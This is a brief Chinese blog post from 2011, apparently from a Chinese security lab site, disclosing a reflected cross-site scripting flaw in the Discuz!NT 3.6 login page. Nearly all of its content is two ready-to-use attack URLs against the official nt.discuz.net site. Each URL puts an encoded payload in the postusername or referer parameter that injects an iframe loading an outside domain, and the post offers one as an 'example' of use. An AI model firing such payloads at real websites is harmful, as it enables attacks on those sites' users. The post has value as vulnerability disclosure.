Discuz!NT 3.6 跨站漏洞 -- 官网测试

2011-07-02

老系统内容 Discuz 测试官网跨站漏洞

约 165 字预计阅读 1 分钟

文章目录

By：猪哥靓

Discuz!NT 3.6 跨站漏洞 -- 官网测试

登陆框提交用户名或密码的时候存在跨站漏洞。

以下是引用片段：

http://nt.discuz.net/login.aspx?postusername=%22%3E%3Ciframe%20src=%22https://lcx.cc%22%3E

可以这样利用的，[size=-1]example：

以下是引用片段：

example：http://nt.discuz.net/login.aspx?referer=%22%3E%3Ciframe%20src=%22https://lcx.cc%22%3E

文章作者 Nuclear'Atk

上次更新 2011-07-02

许可协议 Nuclear'Atk（核攻击）网络安全实验室版权所有，转载请注明出处。